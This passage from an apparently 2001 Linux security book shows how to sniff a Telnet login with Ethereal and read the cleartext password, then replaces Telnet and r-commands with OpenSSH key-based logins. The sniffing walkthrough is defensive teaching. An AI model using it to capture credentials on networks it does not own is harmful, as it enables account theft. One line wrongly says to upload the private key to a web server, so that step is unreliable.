Ethereal:Filters screen +appears.Since no filters have been configured,the configuration screen +is blank. +6. To create a filter that allows only traffic between your host and another +host,you must add a filter name and a filter string.For example,to +create a filter between your host and a host at 24.130.10.35,enter the +filter name and filter string shown in Figure 7.1.Please note that your +IP addresses will not be the same.You need to select your system’s IP +address and the IP address of the system you wish to log in to via Telnet. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 356 +356 Chapter 7 • Avoiding Sniffing Attacks through Encryption +Figure 7.1 Creating a Filter between Two Hosts +7. After the two fields are complete,you must click Save,and then click +New.Click OK to exit the Filter screen. +8. To start a packet capture,simply select the Capture menu and choose +Start.The Capture Preference screen appears.Click Filter and choose +the “Telnet Login”filter that you created.Click OK twice and the +capture starts. +9. To generate the Telnet login packets,Telnet into the Telnet host.For +example,if you wanted to Telnet to a host at 24.130.10.35,you would +enter: +telnet 24.130.10.35 +10. Enter a username and password to log in to the system.If you do not +have a username and password on the Telnet host,create a user telnet +with the password telnet on the Telnet host by entering: +useradd telnet +Create a password for user telnet by entering: +passwd telnet +Changing password for user telnet +New UNIX password: +Retype new UNIX password: +passwd: all authentication tokens updated successfully +11. After you log in as user telnet on the Telnet host,exit the Telnet session. +12. Stop the Ethereal packet capture by clicking Stop. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 357 +Avoiding Sniffing Attacks through Encryption • Chapter 7 357 +13. The packet capture appears in Ethereal.Locate the Telnet data packet that +includes the data:password field.Your screen will resemble Figure 7.2, +which highlights the first password packet. +Figure 7.2 Capturing a Telnet Login Session +14. Scroll to the second password packet.The password field contains the +first character of the telnet password.In this case,the character is the +letter “t,”as shown in Figure 7.3. +Figure 7.3 Identifying the First Character in the Telnet Password +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 358 +358 Chapter 7 • Avoiding Sniffing Attacks through Encryption +15. Telnet sends each password character as a separate packet.If you con- +tinue to scroll down the packet capture and view each Telnet data +packet,you will discover the password. +16. An easier way to discover the Telnet password is to follow the TCP +stream.To do this,simply select any packet involved in this Telnet con- +nection.It can be a TCP or Telnet packet,as long as it is part of the +Telnet session. +17. Once a corresponding packet is selected,select the Tools menu and +select Follow TCP Stream. The contents of the TCP stream appear,as +shown in Figure 7.4. +Figure 7.4 Following a TCP Stream to Discover the Username +and Password +18. The username and password are displayed in clear text.Please note the +echo in the login name.By default,the system distinguishes client +keystrokes with brown,and system text as blue.You can see the brown +and blue text if you are reading the electronic file on this book’s accom- +panying CD;even if you can’t see the brown client text on this printed +page,you can see that the packet sniffer has discovered the username and +password. +19. Save the packet capture as unsectel, and quit Ethereal. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 359 +Avoiding Sniffing Attacks through Encryption • Chapter 7 359 +As you can see,it is possible to intercept a login session and discover a user- +name and password.In this case,a hacker could now log in to the Telnet host +with the same privileges as user telnet.Telnet is a legitimate user,even though the +impersonator is not.The Telnet host is now the victim of a front-door attack. +If network encryption is implemented on the network,the login session will +be encrypted.All of the information passed between the two hosts is rendered +useless because no application data (such as a Telnet packet) is displayed because it +is encrypted,as shown in Figure 7.5. +If the hacker attempts to view the TCP stream to discover the username and +password,it will also render useless information,as shown in Figure 7.6. +Figure 7.5 Login Session with Network Encryption +NOTE +Hackers do not capture all Internet traffic in hopes that they will find +sensitive information. There is simply too much traffic on the Internet, so +this technique would be similar to finding the proverbial needle in a +haystack. Instead, they either focus their packet sniffing on one server or +client interface, or try to hack into a server that contains the sensitive +information they seek. For example, they may attempt to hack into a +bank’s database server that contains client credit card numbers and per- +sonal information. In the steps described in this section, a packet filter +was created on the sniffer to focus on the Telnet host. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 360 +360 Chapter 7 • Avoiding Sniffing Attacks through Encryption +Figure 7.6 Following a TCP Stream When Network Encryption Is Enabled +Damage & Defense… +Securing E-Commerce Transactions +If hackers were alerted to an unsecure server, they could capture packets +going in and out of the server to gain the data they sought. For example, +if an e-commerce server does not use any type of network encryption for +transactions, there is a great deal of data to be gained by a hacker. +Unfortunately, many small companies or entrepreneurs set up their own +Web servers, unaware of potential security problems, and set up simple +scripts to process payment forms. Although the transaction takes place, +it takes place in an unsecured manner. Every packet may contain valuable +information that is very easy to observe over the wire. Secure Sockets +Layer (SSL) is ideal for implementing secure e-commerce transactions. +If a hacker intercepts a credit card number, the number may be +used or sold. When the Web site customer backtracks to determine +where his or her number was stolen, he or she may realize that it +occurred shortly after an Internet transaction. This will tarnish the Web +site’s reputation, since you have lost at least one customer, and eventu- +ally put the site out of business. This is particularly troublesome if the +Web server is under surveillance by a hacker. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 361 +Avoiding Sniffing Attacks through Encryption • Chapter 7 361 +The lesson demonstrated in the following sections demonstrates how to +implement an important network encryption system:Open Secure Shell +(OpenSSH).This system will ensure that all data transmitted between your hosts +is secure,and is useless for hackers. +Using OpenSSH to Encrypt Network +Traffic between Two Hosts +OpenSSH (www.openssh.org) is an open source program that encrypts all traffic +between hosts using secure shell (SSH).It is a secure replacement for common +Internet programs used for remote connectivity,such as Telnet,rlogin,and rsh. +Because it encrypts all traffic,it always hides usernames and passwords used for +remote logins.After the login occurs,it continues to encrypt all data traffic +between the hosts.Open SSH is a free version of the SSH Communications +Security Corporation’s SSH suite (www.ssh.org).As with most open source soft- +ware,the tradeoff is that vendor support is not available.Do not confuse +OpenSSH with the fee-based SSH suite.The OpenSSH home page is shown in +Figure 7.7. +Figure 7.7 OpenSSH Home Page +The OpenBSD Project (www.openbsd.org) develops OpenSSH and the Unix +operating system,OpenBSD.OpenBSD is a free 4.4BSD-based OS that is +designed with security in mind.It uses strong encryption techniques to ward off +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 362 +362 Chapter 7 • Avoiding Sniffing Attacks through Encryption +hackers.OpenBSD claims that the default installation has not experienced a +remote hole in over three years.The OpenBSD Project has ported OpenSSH to +other operating systems,including Linux,HP-UX,AIX,Irix,SCO,MacOS X, +Cygwin,Digital Unix/Tru64/OSF,SNI/Reliant Unix,NeXT,and Solaris.The +OpenBSD home page is shown in Figure 7.8. +Figure 7.8 OpenBSD Home Page +The OpenSSH Suite +OpenSSH is a suite of secure networking connectivity programs.The OpenSSH +suite includes the following programs: +(cid:2) OpenSSH SSH client (SSH) Remote login program,used for secure +remote logins and session encryption.Secure alternative for rlogin and +Telnet. +(cid:2) Secure copy program (SCP) Remote file copy program,used to +securely copy files between network hosts.Supports usernames and +passwords. +(cid:2) Secure file transfer program (SFTP) Used for secure interactive file +transfers.Secure alternative for FTP. +(cid:2) OpenSSH SSH daemon (SSHD) The daemon for SSH. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 363 +Avoiding Sniffing Attacks through Encryption • Chapter 7 363 +Many features are included in the OpenSSH suite that ensure secure trans- +missions across a network,and extend the usefulness of the program.Table 7.1 +lists several of the OpenSSH features. +Table 7.1 OpenSSH Features +Feature Description +Strong Encryption using The 3DES and Blowfish encryption algorithms +Triple Data Encryption are patent free in all countries. 3DES is time +Standard (3DES) and proven, and Blowfish provides faster encryption +Blowfish by using fast block cipher. Either encryption +algorithm can be used. They are applied before +authentication to ensure that all usernames +and passwords are encrypted, as well as the +session data. +Strong Authentication using Protects against authentication vulnerabilities +Public Keys, One-Time Pass- such as IP and Domain Name System (DNS) +words (OTPs) and Kerberos spoofing and fake routes. There are four types +Authentication of authentication methods used with OpenSSH: +(cid:2) Public key authentication only +(cid:2) Public key-based host authentication +along with .rhosts +(cid:2) One-time passwords with s/key +(cid:2) Kerberos authentication +X11 Forwarding for Encrypts X Windows traffic between remote +encrypting X Windows systems. Protects against remote xterm +Traffic snooping and hijacking. +Encrypted Port Forwarding Allows TCP/IP ports to be forwarded to another +system over an encrypted channel. This is ideal +for Internet protocols that do not inherently +support encryption, such as POP or SMTP. +Agent Forwarding for Single A user’s authentication keys can be stored on +Network Login the user’s local machine, which becomes the +authentication agent. When the user accesses +the network from another system, the connec- +tion is forwarded to this authentication agent. +This prevents the authentication keys from +being installed on any network system, and +allows the user to securely access the network +from any system. +Interoperability Complies with multiple SSH protocol versions +(SSH 1.3, 1.5 and 2.0). +Continued +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 364 +364 Chapter 7 • Avoiding Sniffing Attacks through Encryption +Table 7.1 Continued +Feature Description +Data Compression Allows data compression to occur before data +encryption. This is important for networks with +slow connections. +Passes Kerberos and Andrew Allows users to access AFS and Kerberos +File System (AFS) Tickets to services by entering their password only one +Remote Systems time. +NOTE +OpenSSH 2.0 supports the SSH 1.3, 1.5, and 2.0 protocol. It is important +to know that SSH 2.0 does not use the Rivest, Shamir, Adleman (RSA) +algorithms, but does support it. Because RSA algorithms still had an +effective patent, the SSH 2.0 developers decided to use the Diffie- +Hellman (DH) and Digital Signature Algorithm (DSA) algorithms instead. +Therefore, if your SSH client and servers use SSH 1.3, 1.5, or 2.0, they +will be compatible. Most commercial implementations for Unix, +Windows, and others use these versions. +Installing OpenSSH +OpenSSH implementations are significantly different between operating systems +because of authentication.In fact,the developers split development into two +categories: +(cid:2) OpenBSD-based development Produces secure,clean,and simple +OpenSSH code for the OpenBSD operating system. +(cid:2) OpenSSH Portability Team Uses the OpenBSD OpenSSH code to +develop portable versions for other operating systems.Each portable +version is indicated with a “p”to differentiate it from the OpenBSD +version.Portable versions are not released at the same time as the +OpenBSD versions.They usually take longer to release,since more time +is required for the additional code. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 365 +Avoiding Sniffing Attacks through Encryption • Chapter 7 365 +Make sure that you are downloading the specific version for your operating +system.To determine if your operating system is supported,visit the Portable +OpenSSH Web page at www.openssh.org/portable.html.The download links for +each version are located at the bottom of the Web page.Simply scroll down to +locate the download site nearest you,and then identify your particular operating +system.The OpenSSH installation files required for Linux are included on the +CD accompanying this book.The portable OpenSSH Web page is shown in +Figure 7.9. +Figure 7.9 Operating Systems Supported by Portable OpenSSH +OpenSSH is becoming very popular,and operating systems are now released +with OpenSSH installed by default.For example,Red Hat Linux 7 installs +OpenSSH 2.1.1p7-1 during the installation process.The following operating sys- +tems also include OpenSSH into the base system,as shown in Figure 7.10.These +systems include Red Hat,SuSE,Mandrake Linux,FreeBSD,and others. +From the preceding information,you can now determine whether you need +to download and install OpenSSH.The examples in this chapter use Red Hat +Linux 7.A portable version of OpenSSH has already been created.It is a Red +Hat Package Manager (RPM) that is included into the base system of Red Hat +Linux 7.These installation files are also located on the CD accompanying this +book.Therefore,we are ready to begin configuring OpenSSH after we confirm +that OpenSSH is installed. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 366 +366 Chapter 7 • Avoiding Sniffing Attacks through Encryption +Figure 7.10 Operating Systems That Incorporate OpenSSH +1. To ensure that OpenSSH RPM is installed on your system,enter the +following: +rpm –qa | grep ssh +2. You should receive the following response if SSH is installed: +openssh-askpass-gnome-2.1.1p4-1 +openssh-clients-2.1.1p4-1 +openssh-2.1.1p4-1 +openssh-server-2.1.1p4-1 +openssh-askpass-2.1.1p4-1 +If you receive this response,you are ready to configure OpenSSH. +3. If you receive no response,install these files from the accompanying CD, +or access www.openssh.org/portable.html to locate a download site +nearest you,and download the portable version that matches your oper- +ating system.For example,since I am located in Los Angeles,I would +locate the Santa Barbara,CA,USA section,and select the “Linux +RPMs”link.Then,choose the RH70/ directory (or equivalent),and +download the corresponding RPMs from Step #2.The versions will be +higher than the versions incorporated into the Red Hat Linux 7 release, +as shown in Figure 7.11. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 367 +Avoiding Sniffing Attacks through Encryption • Chapter 7 367 +Figure 7.11 Downloading OpenSSH RPMs for Red Hat Linux 7 +4. Multiple versions will exist for each RPM.Download the latest version +of each. +5. Install the RPMs by using the rpm -i command.Once installed,you are +ready to configure OpenSSH. +Configuring SSH +SSH is the OpenSSH SSH client,and works with the SSHD (SSH daemon). +They work together to replace rlogin and rsh.SSH is also a replacement for +Telnet.SSH is used to log in to a remote system and execute commands on the +remote system.The difference between SSH and Telnet,rlogin,and rsh is that +SSH is secure. +At the beginning of this chapter,you used a Telnet connection to log in to a +remote host.The entire session was unsecure because all data was sent in clear +text,including the username and password.Using the packet sniffer Ethereal,you +were able to capture the Telnet session packets and follow the Transmission +Control Protocol (TCP) stream.You discovered the username and password used +to establish the connection.Since you now have the username,password,and +remote host Internet Protocol (IP) address (in this case),you can now log in as +the user whose packets you captured. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 368 +368 Chapter 7 • Avoiding Sniffing Attacks through Encryption +Using a similar method,you can also capture rlogin and rsh sessions and +determine the needed authentication data.For example,because rlogin and rsh +use host authentication,you can determine the IP address or fully qualified +domain name (FQDN),and the username required to log in to the host.Once +the host name and username for authentication are determined,they can be used +for IP and Domain Name System (DNS) spoofing. +The SSH client is a replacement for Telnet,rlogin and rsh.It provides a secure +data channel between two hosts on a network.These hosts can be untrusted and +the network can be unsecured. In order to work,both hosts must support SSH. +One host then connects to another host using an encrypted connection.Because +the connection is encrypted,any hacker who captures the data will have an +extremely difficult time decrypting it. +How SSH Works +The method for implementing SSH combines similar r-command concepts with +a private and public key method.In order to understand how SSH works,it is a +good idea to understand how the older r-commands work. +Insecure r-command Authentication +The following authentication method is used for r-commands,such as rlogin,rsh, +or rcp,in Red Hat Linux 7.For the example,rlogin will be used.Any user log- +ging on to a remote system must have a user account on the remote system.For +this example,we will use the account susan.If Susan is logged on locally when +she connects to a remote host,no password is needed to access the remote host. +No password is needed because her account is authenticated by an entry in the +.rhosts file located in the remote system’s $HOME/susan directory.The .rhosts +file must be created in the susan home directory. +The .rhosts file contains the host name and username required for Susan to +log in to the system.The host name of Susan’s system is we-24-130-10-205.we +.mediaone.net,and her username is susan.If her rlogin command matches the +entry in the .rhosts file,she is allowed access to the system.No password is +required.The .rhosts file is formatted as follows: +hostname username +The hostname should be the FQDN of the host,not the short host name. +For example,use: +we-24-130-10-205.we.mediaone.net +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 369 +Avoiding Sniffing Attacks through Encryption • Chapter 7 369 +instead of: +we-24-130-10-205 +The username must be an account on the system.If a user account exists for +this username on the system,the user can access all user accounts except root. +As mentioned earlier,for Susan to log in remotely,the root user of the +remote host must create a .rhosts file in the $HOME/susan directory with her +host name and username.For example,if Susan’s machine were host name +we-24-130-10-205.we.mediaone.net,the root user would enter the following: +we-24-130-10-205.we.mediaone.net susan +When Susan is ready to access the remote host,she would enter the following +rlogin command: +rlogin –l susan we-24-130-8-170.we.mediaone.net +where we-24-130-8-170.we.mediaone.net is the remote host.The -l option indi- +cates the account used for the login,which is susan. +This method is not secure because the host name and username are sent to +the remote host for authentication in clear text.This method opens the remote +host to IP spoofing,DNS spoofing,and routing spoofing. +Because of these security vulnerabilities,it is recommended that you disable +the r-command utilities.This process was discussed in Chapter 2,“Hardening the +Operating System,”using the /etc/xinetd.d directory and commenting out the +associated text files.The /etc/xinetd.d directory makes it simple to disable ser- +vices that your system is not using.For example,you can disable the rlogin and +rsh services by commenting out the rlogin and rsh entries in the respective file +and restarting the service.If the service is commented out,it will not restart. +Once disabled,no one can access the machine via the r-command utilities. +1. To disable rlogin,you must edit the /etc/xinetd.d/rlogin file.Open the +rlogin file,as shown in Figure 7.12,using vi or an editor of your choice. +2. Comment out the service login line by adding a number sign (#) before it: +#service login +3. Write and quit the file. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 370 +370 Chapter 7 • Avoiding Sniffing Attacks through Encryption +Figure 7.12 Disabling rlogin Using the /xinetd.d/rlogin File +4. Next,you must restart xinetd by entering: +/etc/rc.d/init.d/xinetd restart +Stopping xinetd: [ OK } +Starting xinetd: [ OK } +5. Disable the rsh service using the same method (e.g.,edit the /etc/ +xinetd.d/rsh and /etc/xinetd.d/rexec files by commenting out the service +shell line). +NOTE +The rexec service is another r-command tool that provides authentication +based on usernames and passwords for remote execution purposes. It is +disabled by default. +6. To provide additional security,disable the Telnet service using the same +method (e.g.,edit the /xinetd.d/telnet file by commenting out the ser- +vice telnet line). +7. Restart xinetd. +You have disabled the remote client programs that send information without +encryption.Because these programs are vulnerable to attacks,they should be +replaced entirely by SSH.The following sections demonstrate how SSH replaces +these programs. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 371 +Avoiding Sniffing Attacks through Encryption • Chapter 7 371 +Secure SSH Authentication +SSH is based on public-key cryptography.Versions before SSH 2.0 use RSA- +based authentication.Version SSH 2.0 and later use the unpatented DSA instead. +Public-key cryptography uses private and public keys to ensure authentication. +The private key is only known by the user,and the public key is available to +everyone else,such as the remote host. +SSH can create a DSA private/public key pair for a user by using the +ssh-keygen -d command.In SSH 2.0,the private DSA key is stored in the +$HOME/.ssh/id_dsa file.The public key is placed in the $HOME/.ssh/id_dsa.pub +file.The public key should be renamed and copied to the $HOME/.ssh/ +authorized_keys2 file on the remote system.The authorized_keys2 file contains +one public key per line. +NOTE +The $HOME/.ssh/authorized_keys2 file on the remote host is the SSH +equivalent to the $HOME/.rhosts file used for the r-commands. Earlier in +this chapter, you learned how the .rhosts file is configured to allow a +user account to log in remotely using rlogin. +In SSH version 1,RSA authentication is used.An RSA private/public key is +created in either OpenSSH version by entering the ssh-keygen command +without the -d option.The private key is stored in the $HOME/.ssh/identity +file,and the public key is stored in the $HOME/.ssh/identity.pub file of the +user’s home directory.The public key should be renamed and copied to the user’s +home directory on the remote system,to the $HOME/.ssh/authorized_keys file. +SSH offers password authentication if the public-key authentication fails.It +also provides password authentication if public-key authentication is not available. +This flexibility allows the password to be encrypted and transmitted over the +network so that data integrity persists,even if the public-key authentication does +not work.Table 7.2 summarizes the locations of the private and public keys used +in SSH. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 372 +372 Chapter 7 • Avoiding Sniffing Attacks through Encryption +Table 7.2 Public-Key Authentication Locations for SSH +SSH Version Local System Default +2 Key Location Remote Host Location +Private key $HOME/.ssh/id_dsa Not applicable +Public key $HOME/.ssh/id_dsa.pub $HOME/.ssh/authorized_keys2 +SSH Version Local System Default +1 Key Location Remote Host Location +Private key $HOME/.ssh/identity Not applicable +Public key $HOME/.ssh/identity.pub $HOME/.ssh/authorized_keys +Other important files used to identify public keys on a system are listed in +Table 7.3. +Table 7.3 Additional Files Used in SSH +SSH File Description +$HOME/.ssh/known_hosts Lists the public keys for all the hosts to which +the user has logged in. The host public keys are +listed here if they are not listed in +/etc/ssh_known_hosts. +/etc/ssh_known_hosts Lists the RSA-generated public keys for all the +hosts that the system knows. For example, any +host that logs in to the system should have its +public key listed in this file. Your network admin- +istrator should configure this file to list all the +user public keys in your company. It should be a +world-readable file, with one public key listed +per line. +/etc/ssh_known_hosts2 Same as the ssh_known_hosts file, except it lists +the DSA-generated public keys for all hosts that +the system knows. +$HOME/.ssh/config Configuration file for each user. Each user can +have a specific configuration file (if needed), +which is used by the SSH client. +/etc/ssh/ssh_config Configuration file for the entire system. It is +world readable and provides values for users +who do not have a configuration file. This file is +required for SSHD to start, and is automatically +generated upon OpenSSH installation. +Continued +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 373 +Avoiding Sniffing Attacks through Encryption • Chapter 7 373 +Table 7.3 Continued +SSH File Description +$HOME/.ssh/rc Lists commands that will be executed during +user login. These commands are run immediately +prior to the opening of the user’s shell. Used to +run any required routines (if needed) before the +home directory of the user is accessible. For +example, AFS may be needed for the user. +/etc/sshrc Similar to the $HOME/.ssh/rc file, except it +specifies commands that must be run +immediately prior to systemwide. It should be +world readable. +Implementing SSH to Secure Data +Transmissions over an Insecure Network +Before you implement SSH,you need to make sure both the local system and +the remote system have SSH installed.It is also a good idea to use SSH 2.0 or +later on each system.This ensures that the DSA algorithm is used instead of the +RSA algorithm,which is patented in some countries.In the following examples, +both systems are running Red Hat Linux 7 with SSH 2.1 installed.Therefore,the +DSA algorithm will be used,and no SSH installation is necessary because SSH is +built into the operating system. +The ssh-keygen command is used to generate and manage SSH authentication +keys.To implement SSH,you must first use ssh-keygen to create a private and +public key on the client using either RSA or DSA authentication.The following +steps demonstrate how to implement SSH to securely access a remote system. +1. Create a user on the client system.For example,create the user dilbert. +Enter: +useradd dilbert +2. Create a password for user dilbert by entering: +passwd dilbert +Changing password for user dilbert +New UNIX password: +Retype new UNIX password: +passwd: all authentication tokens updated successfully +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 374 +374 Chapter 7 • Avoiding Sniffing Attacks through Encryption +3. Log on as user dilbert. +4. Generate a public and private key (key pair) for dilbert by entering the +following command. +ssh-keygen –d +NOTE +By default, SSH generates an RSA key for SSH 1.3 and 1.5. To generate a +DSA key for SSH 2.0, you must specify the -d option when generating +the key pair. +5. You will receive the following response: +Generating DSA parameter and key. +Enter file in which to save the key (/home/dilbert/.ssh/id_dsa): +6. Press ENTER to save the key to the default directory and filename +(/home/dilbert/.ssh/id_dsa).You will then receive the following +response: +Created directory '/home/dilbert/.ssh'. +Enter passphrase (empty for no passphrase): +7. The program requests a passphrase.For this example,do not enter a +passphrase.The passphrase is used by 3DES to encrypt the private por- +tion of the private key.A passphrase must be empty for host keys.If you +enter a passphrase,do not use simple sentences.Instead,make it at least +10 to 30 characters with numbers,symbols,and letters.Passphrases can +later be changed using the -p option.Press ENTER twice for no +passphrase. +SECURITY ALERT! +Passphrases are not recoverable. If you forget your passphrase, a new +key must be generated. You must then distribute the new public key to +all required systems. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 375 +Avoiding Sniffing Attacks through Encryption • Chapter 7 375 +8. The key generator summary will appear: +Your identification has been saved in /home/dilbert/.ssh/id_dsa. +Your public key has been saved in /home/dilbert/.ssh/id_dsa.pub. +The key fingerprint is: +ca:3b:f9:80:5a:91:e5:c1:1e:5b:30:02:2f:d5:53:13 +dilbert@we-24-130-10-205.we.mediaone.net +9. The entire key-generation process is shown in Figure 7.13. +Figure 7.13 Generating a Private and Public Key Using the +ssh-keygen Command +10. You have generated dilbert’s private and public keys.View dilbert’s pri- +vate key by entering: +cat /home/dilbert/.ssh/id_dsa +The private key will resemble Figure 7.14.The private key must +always remain secure on the local system. +Figure 7.14 DSA Private Key for User Dilbert +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 376 +376 Chapter 7 • Avoiding Sniffing Attacks through Encryption +11. View dilbert’s public key by entering: +cat /home/dilbert/.ssh/id_dsa.pub +Dilbert’s public key can be distributed freely.Any system with which +dilbert needs to communicate securely will need to obtain his public +key.Dilbert’s public key will resemble Figure 7.15. +Figure 7.15 DSA Public Key for User Dilbert +NOTE +You can rename the public key before you distribute it. For example, you +can rename it “dilbert.pub.” This is much easier to remember, and will be +different from other user public keys created with DSA. You should always +rename the public key after you generate a public and private key. +Distributing the Public Key +You must now activate the keys by placing the public key in the proper location +on the remote server.The public key can be distributed freely;therefore,you can +send it any way you want to the remote host. +For example,VeriSign offers digital ID services for e-mail clients to transmit +e-mail securely.The digital ID is basically a public key with ID information +embedded.VeriSign automatically posts the user’s public key on its Web site.Any +user who needs to access a public key for a specific user can download the user’s +digital ID from the VeriSign Web site at https://digitalid.verisign.com/services/ +client/index.html. +Figure 7.16 shows the information for downloading the public key (digital +ID) for the user George Bush.It is doubtful that this George Bush is the +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 377 +Avoiding Sniffing Attacks through Encryption • Chapter 7 377 +President of the United States.The U.S.Federal Bureau of Investigations (FBI) +would most likely have the President’s public key unlisted,which is an option for +all VeriSign users.If you needed to transmit e-mail securely with this user,you +would download his public key.He would need to download your public key as +well.When both of you had each other’s public keys,you could transmit data to +one another securely. +Figure 7.16 Downloading Pubic Keys from the VeriSign Web Site +For this demonstration,you will upload dilbert’s private key to a Web server. +The remote host will then download the public key and activate it.The public key +is activated when placed into dilbert’s $HOME/.ssh/authorized_keys2 file on the +remote system.The following steps demonstrate how to accomplish these tasks. +1. You will upload dilbert’s public key to the Apache Web server on your +system.Make sure that Apache is installed by entering: +rpm –qa | grep apache +2. You should receive a response similar to the following if Apache is +installed: +apache-manual-1.3.12-25 +apache-1.3.12-25 +apache-devel-1.3.12-25 +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 378 +378 Chapter 7 • Avoiding Sniffing Attacks through Encryption +3. If you do not receive a response,you need to download and install +Apache. +4. Create a pubkeys directory in the default apache root directory by +entering the following: +mkdir /var/www/html/pubkeys +5. Copy and rename dilbert’s public key to this Web directory by entering: +cp /home/dilbert/.ssh/id_dsa.pub +/var/www/html/pubkeys/dilbert.pub +6. You have uploaded the public key to your local Apache server.Verify it is +uploaded by opening a browser,such as lynx or Netscape Navigator,and +entering: +http://localhost/pubkeys/ +The directory contents are listed by default.You should see +dilbert.pub listed.If not,confirm the root Web directory in Apache and +make sure you copied the public key to the correct directory. +7. Remote Host:You need a second system to be the remote host.We will +refer to the first system (the one you just configured) as the client.The +remote system in this demonstration is a Red Hat Linux 7 system +located on the same network.Log in to the remote host as root. +8. Remote Host:You need to create a dilbert account.Use the same pass- +word from the client system.Enter: +useradd dilbert +9. Remote Host:Create a password for user dilbert by entering: +passwd dilbert +Changing password for user dilbert +New UNIX password: +Retype new UNIX password: +passwd: all authentication tokens updated successfully +10. Remote Host:Create a .ssh directory in dilbert’s home directory by +entering the following command: +cd /home/dilbert +mkdir .ssh +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 379 +Avoiding Sniffing Attacks through Encryption • Chapter 7 379 +11. Remote Host:Open a Web browser and access dilbert’s public key +from the client’s Apache server.Enter the URL of host and the pubkey +directory.For example,if you configured Apache on we-24-130-10-205 +.we.mediaone.net,you will enter: +http://we-24-130-10-205.we.mediaone.net/pubkey +Your browser window will resemble Figure 7.17 in Navigator. +Figure 7.17 Accessing a Public Key from a Web Site +12. Remote Host:Download the public key to the remote host.For +example,save it to the root user directory. +13. Remote Host:Next,you need to copy the contents of dilbert’s public +key file to the /home/dilbert/.ssh/authorized_keys2 file.This file does +not currently exist.The simplest way to transfer the public key to this +file is to copy dilbert.pub and rename it as authorized_keys2.For +example,if you downloaded dilbert’s public key to the root user direc- +tory,you would enter (from the root user directory): +cp dilbert.pub /home/dilbert/.ssh/authorized_keys2 +The authorized_key2 file lists the public DSA keys that can be used +for login by the user.Each public key must be listed as one line in the +file.The id_dsa.pub file,when viewed in a text editor,is written as one +line.Therefore,it is important that the key is copied as only one line +when placed in the authorized_key2 file. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 380 +380 Chapter 7 • Avoiding Sniffing Attacks through Encryption +14. Client Host:Physically access the client host. +15. Client Host:Log on as dilbert. +16. Client Host:Log in to the remote host using ssh.If the remote host +were we-24-130-8-170.we.mediaone.net,you would enter: +ssh we-24-130-8-170.we.mediaone.net +17. Client Host:You will receive a message similar to the following: +The authenticity of host 'we-24-130-8-170.we.mediaone.net' can't +be established. +DSA key fingerprint is +9a:e6:64:34:d5:fa:f7:e4:e9:fd:b7:e5:95:b0:1e:40. +Are you sure you want to continue connecting (yes/no)? +The message stating “The authenticity of host ‘we-24-130-8- +170.we.mediaone.net’can’t be established”is a standard message that +informs you that a trust relationship has not yet been established.This is +standard for the first time a trust is established,and is seen on both the +commercial and open versions of SSH. +18. Client Host:Enter Yes to continue connecting.The following warning +message appears,indicating that the remote host’s public key is added to +the client’s $HOME/.ssh/known_hosts file.You will not receive these +warnings when you log in to the remote host in the future,as the trust +relationship has been established.It is then followed by a prompt (no +password is required due to the key pair): +Warning: Permanently added 'we-24-130-8-170.we.mediaone +.net,24.130.8.170' (DSA) to the list of known hosts. +[dilbert@we-24-130-8-170 dilbert]$ +19. Client Host:You will receive a remote host command prompt for dil- +bert.All data transmitted between your system and the remote host are +encrypted. +20. Client Host:Quit the session by entering the exit command. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 381 +Avoiding Sniffing Attacks through Encryption • Chapter 7 381 +NOTE +If public key authentication fails, or if you are logged on to the client +system as a user other that dilbert, ssh will request a password: +dilbert@we-24-130-8-170.we.mediaone.net's password: +Dilbert can securely enter his password for the remote host, since he +has an account. His username and password will be encrypted via SSH, +so the transmission is still secure. If you are asked for a password, you +need to retrace your steps. If public key authentication is set up properly, +you will not be asked for a password. +Capturing and Analyzing +Encyrpted Network Traffic +Now that we have created an SSH connection between two hosts,we need to +prove that the session is actually encrypted.To prove this,you will capture packets +between the hosts during the SSH session.You will attempt to locate any login +data,as well as any session data,and then follow the TCP stream. +1. Log in as root to the SSH remote host. +2. Remote Host:To add filters to Ethereal without using host names,open +a command interface and enter: +ethereal -n +3. Remote Host:Select the Edit menu and choose Filters.The Ethereal: +Filters screen appears. +4. Remote Host:To create a filter that allows only traffic between the SSH +hosts,you must add a filter name and a filter string.For example,to +create a filter between your remote host and a client host at +24.130.10.205,enter the filter name “SSH Login”and filter string +shown in Figure 7.18.Please note that your IP addresses will not be the +same.You need to select the IP address of your client and remote SSH +hosts.After the two fields are complete,you must click Save,and then +click New.Your screen will appear similar to Figure 7.18. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 382 +382 Chapter 7 • Avoiding Sniffing Attacks through Encryption +Figure 7.18 Creating a Filter between SSH Two Hosts +5. Remote Host:Click OK to exit the Filter screen. +6. Remote Host:To start a packet capture,simply select the Capture menu +and choose Start.The Capture Preference screen appears.Click Filter +and choose the “SSH Login”filter that you created.Click OK twice and +the capture starts. +7. Client Host:Physically access the client host and log in as dilbert. +8. Client Host:To generate the SSH login packets,log in into the remote +SSH host.For example,to log in to the SSH host at 24.130.8.170,you +would enter: +ssh 24.130.8.170 +9. Client Host:After you log in as user dilbert (no password is required +because of the public key cryptography) on the remote SSH host,enter +a simple command to generate data through the connection.For +example,enter: +/sbin/ifconfig +10. Client Host:Exit the SSH session by entering the exit command. +11. Remote Host:Physically access the remote 